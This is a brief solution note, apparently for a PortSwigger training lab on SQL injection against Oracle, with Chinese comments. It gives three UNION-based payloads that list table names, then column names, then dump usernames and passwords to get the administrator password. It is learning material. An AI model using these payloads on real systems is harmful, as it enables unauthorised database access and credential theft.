subject

Lab: SQL injection attack, listing the database contents on Oracle

Url: portswigger.net/web-securit…

Mind Palce

# 查询所有表名
' union select null,table_name from all_tables--
# ==> 查找到可疑表名：USERS_EMXHNC

# 查询列名
' union select null,column_name from all_tab_columns where table_name='USERS_EMXHNC'--
# ==> 获得列名：PASSWORD_RZRLAX USERNAME_HMDTHK

# 查询具体的值
' union select PASSWORD_RZRLAX,USERNAME_HMDTHK from USERS_EMXHNC--
# ==> 获得administrator账户的密码

END \(^o^)/